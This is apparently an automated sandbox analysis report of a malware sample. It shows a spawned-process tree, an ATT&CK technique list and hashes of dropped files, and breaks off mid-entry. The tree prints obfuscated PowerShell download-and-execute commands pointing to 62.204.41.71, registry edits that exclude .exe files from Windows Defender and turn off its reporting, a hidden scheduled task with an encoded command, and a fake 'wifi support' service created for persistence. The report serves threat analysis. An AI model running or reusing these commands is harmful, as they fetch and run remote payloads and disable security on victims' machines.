"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5596

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
5⤵
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 488
6⤵
- Program crash
PID:5312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
PID:1036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
5⤵
PID:6656

C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
6⤵
- Views/modifies file attributes
PID:7032

C:\Users\Admin\Documents\u4gfw0sBVYFHhY5DAjdCvnHN.exe
"C:\Users\Admin\Documents\u4gfw0sBVYFHhY5DAjdCvnHN.exe"
3⤵
- Executes dropped EXE
PID:3556

C:\Users\Admin\AppData\Local\Temp\99f9555e-dbc4-466e-ba96-b8bc65517e33.exe
"C:\Users\Admin\AppData\Local\Temp\99f9555e-dbc4-466e-ba96-b8bc65517e33.exe"
4⤵
PID:1196

C:\Users\Admin\Documents\UHT_bSrezyW4_ylhYHfmRHsp.exe
"C:\Users\Admin\Documents\UHT_bSrezyW4_ylhYHfmRHsp.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:7080

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:5584

C:\Users\Admin\Documents\jiwHQbRWik1NbgpsMMK_RPw4.exe
"C:\Users\Admin\Documents\jiwHQbRWik1NbgpsMMK_RPw4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 2084
4⤵
- Program crash
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 2104
4⤵
- Program crash
PID:5440

C:\Users\Admin\Documents\3nWS9mtjydv0EYKSexK6jvue.exe
"C:\Users\Admin\Documents\3nWS9mtjydv0EYKSexK6jvue.exe"
3⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:6900

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:4600

C:\Users\Admin\Documents\mqUS9pfmjpxD6tnMvCG8tmLR.exe
"C:\Users\Admin\Documents\mqUS9pfmjpxD6tnMvCG8tmLR.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3576

C:\Users\Admin\AppData\Local\Temp\7zSCFE0.tmp\Install.exe
.\Install.exe
4⤵
PID:3436

C:\Users\Admin\AppData\Local\Temp\7zSFA3C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6420

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:7948

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:1360

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:7932

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:4752

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:1932

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:6640

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:1908

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:6216

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gAgDotoSI" /SC once /ST 00:36:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:876

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gAgDotoSI"
6⤵
PID:4856

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gAgDotoSI"
6⤵
PID:7364

C:\Users\Admin\Documents\Qc7KIcDfiYfydL5DSescCWOw.exe
"C:\Users\Admin\Documents\Qc7KIcDfiYfydL5DSescCWOw.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2260

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:6272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 600
4⤵
- Program crash
PID:6692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 920
4⤵
- Executes dropped EXE
- Program crash
PID:5192

C:\Users\Admin\Documents\_HlXxNG5AQYndZwXllXrur0a.exe
"C:\Users\Admin\Documents\_HlXxNG5AQYndZwXllXrur0a.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 672
4⤵
- Program crash
PID:6988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 788
4⤵
- Program crash
PID:7552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 924
4⤵
- Program crash
PID:6004

C:\Users\Admin\Documents\8RGwJeASNEQxag9mfYeJMpCm.exe
"C:\Users\Admin\Documents\8RGwJeASNEQxag9mfYeJMpCm.exe"
3⤵
PID:6000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 460
4⤵
- Program crash
PID:6492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 456
4⤵
- Program crash
PID:6604

C:\Users\Admin\Documents\4YQKJlewyBB0fLojz4rH99uc.exe
"C:\Users\Admin\Documents\4YQKJlewyBB0fLojz4rH99uc.exe"
3⤵
PID:5988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rimuzga\
4⤵
PID:6892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wwdiohqn.exe" C:\Windows\SysWOW64\rimuzga\
4⤵
PID:7100

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create rimuzga binPath= "C:\Windows\SysWOW64\rimuzga\wwdiohqn.exe /d\"C:\Users\Admin\Documents\4YQKJlewyBB0fLojz4rH99uc.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:4856

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description rimuzga "wifi internet conection"
4⤵
PID:5180

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start rimuzga
4⤵
PID:6544

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:7348

C:\Users\Admin\Documents\L1DnwuxFBJwaJcHIHFEkNhPV.exe
"C:\Users\Admin\Documents\L1DnwuxFBJwaJcHIHFEkNhPV.exe"
3⤵
PID:5856

C:\Users\Admin\Documents\a5M64V1UDqsseuIVKDYxioKD.exe
"C:\Users\Admin\Documents\a5M64V1UDqsseuIVKDYxioKD.exe"
3⤵
PID:5828

C:\Users\Admin\Documents\AfBSXBRO7Qq5_st9NSDzoRb3.exe
"C:\Users\Admin\Documents\AfBSXBRO7Qq5_st9NSDzoRb3.exe"
3⤵
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 460
4⤵
- Program crash
PID:6732

C:\Users\Admin\Documents\rO8Pmpc__SDb1SlkPhzqKAHD.exe
"C:\Users\Admin\Documents\rO8Pmpc__SDb1SlkPhzqKAHD.exe"
3⤵
- Executes dropped EXE
PID:1100

C:\Users\Admin\Documents\fceA53uYio4HPjgvfAJOpNRh.exe
"C:\Users\Admin\Documents\fceA53uYio4HPjgvfAJOpNRh.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 460
4⤵
- Program crash
PID:6480

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3944

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4884

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:4356

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 604
3⤵
- Program crash
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 780 -ip 780
1⤵
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4212 -ip 4212
1⤵
PID:2120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4204 -ip 4204
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3708 -ip 3708
1⤵
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2012 -ip 2012
1⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5820 -ip 5820
1⤵
PID:5216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6000 -ip 6000
1⤵
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3708 -ip 3708
1⤵
PID:6244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2260 -ip 2260
1⤵
PID:6300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2012 -ip 2012
1⤵
PID:6444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2012 -ip 2012
1⤵
PID:6644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6080 -ip 6080
1⤵
PID:7048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3080 -ip 3080
1⤵
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5080 -ip 5080
1⤵
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7152 -ip 7152
1⤵
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5828 -ip 5828
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5856 -ip 5856
1⤵
PID:7212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3852 -ip 3852
1⤵
PID:7232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 6080 -ip 6080
1⤵
PID:7276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7152 -ip 7152
1⤵
PID:7332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 3080 -ip 3080
1⤵
PID:7376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5828 -ip 5828
1⤵
PID:7392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 5080 -ip 5080
1⤵
PID:7432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5988 -ip 5988
1⤵
PID:7388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5856 -ip 5856
1⤵
PID:7844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7152 -ip 7152
1⤵
PID:7932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 6000 -ip 6000
1⤵
PID:8072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1732 -ip 1732
1⤵
PID:8120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 2012 -ip 2012
1⤵
PID:5180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5820 -ip 5820
1⤵
PID:6824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 7152 -ip 7152
1⤵
PID:2332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5476 -ip 5476
1⤵
PID:8124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3852 -ip 3852
1⤵
PID:6896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2012 -ip 2012
1⤵
PID:7448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:6624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:7096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 3020 -ip 3020
1⤵
PID:7676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 2260 -ip 2260
1⤵
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1732 -ip 1732
1⤵
PID:60

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 7152 -ip 7152
1⤵
PID:6228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1732 -ip 1732
1⤵
PID:7284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 7152 -ip 7152
1⤵
PID:6756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3036 -ip 3036
1⤵
PID:824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7152 -ip 7152
1⤵
PID:2104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 7636 -ip 7636
1⤵
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7152 -ip 7152
1⤵
PID:5608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 3036 -ip 3036
1⤵
PID:2452

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
MD5
637481df32351129e60560d5a5c100b5

SHA1
a46aee6e5a4a4893fba5806bcc14fc7fb3ce80ae

SHA256
1f1029d94ca4656a577d554cedd79d447658f475af08620084897a5523587052

SHA512
604bfd0a78a57dfddd45872803501ad89491e37e89e0778b0f13644fa9164ff509955a57469dfdd65a05bbedaf0acb669f68430e84800d17efe7d360a70569e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
bfec499a7eadaae15d59feb2b7d28af7

SHA1
85144f3c3217f7af54e7004fb2c72d741a765619

SHA256
72d9e389cd65ca8387ecc7a70be71fc71f30604105c9440186fe4863da94cc7c

SHA512
98f872cf781530d85210d6176ee98594c4f9fea33f95367e4f6ee7c7804af17cff8214e4263bc34e50da86cccfc46109804f1f29cf24ea6a29d098a73a1a558d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
MD5
37a7c53b99bccc053257dc21449015f4

SHA1
677895df246de2063c24fa79e14780c0ce449097

SHA256
c55bbaad1e4c51f9222e23abd76e08c5bf5b72c4a42035e7e02635fe0ff40a1c

SHA512
9e6dc560fa00b8085dc97944c640aa2472ed1952e254c5f589cc0f810b47bc6d54fa6f3e19d3ff9176d80a713074734753ad7c5d29ae2e6a6bd04ed2e7801db6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
6e1c9852c2af63583b2af6bd326a5828

SHA1
1f74af6780cfe06d95a0cad4ef59270e898b3136

SHA256
c4ea35555f0f50866a9313242f8ec36b6bff5f98cab5ffc846d3f408d09dec3f

SHA512
89cd5349b5536cd192087bfd84e16fa2e350dd58bd04321d240fd36e0c26eb47dbd0b8c7110a169a536b28107ec6373fc21d5fb3b9078174bea096fadd86853d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
6e1c9852c2af63583b2af6bd326a5828

SHA1
1f74af6780cfe06d95a0cad4ef59270e898b3136

SHA256
c4ea35555f0f50866a9313242f8ec36b6bff5f98cab5ffc846d3f408d09dec3f

SHA512
89cd5349b5536cd192087bfd84e16fa2e350dd58bd04321d240fd36e0c26eb47dbd0b8c7110a169a536b28107ec6373fc21d5fb3b9078174bea096fadd86853d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
6e1c9852c2af63583b2af6bd326a5828

SHA1
